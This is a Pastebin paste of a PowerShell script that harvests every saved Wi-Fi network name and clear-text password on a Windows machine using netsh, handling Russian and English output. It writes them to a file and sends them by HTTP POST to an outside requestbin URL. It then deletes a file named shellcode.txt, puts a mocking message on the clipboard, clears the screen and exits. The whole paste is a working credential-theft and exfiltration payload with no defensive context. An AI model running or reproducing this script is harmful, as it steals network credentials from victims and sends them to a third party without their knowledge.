Advertisement
zaherg2291

1

Jan 17th, 2019
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.92 KB | None | 0 0
  1. $wifi_ru=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
  2. $wifi_en=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "key\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
  3. $url="https://requestbin.jumio.com/13kvlx91"
  4. $wifi_ru
  5. $wifi_ru | Out-File tmp.txt
  6. $data=Get-Content .\tmp.txt
  7. $data
  8. Invoke-RestMethod -Method Post -Uri $url -Body $data
  9. Remove-Item -Path shellcode.txt
  10. Set-Clipboard -Value "Your computer was fucked up!"
  11. clear
  12. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement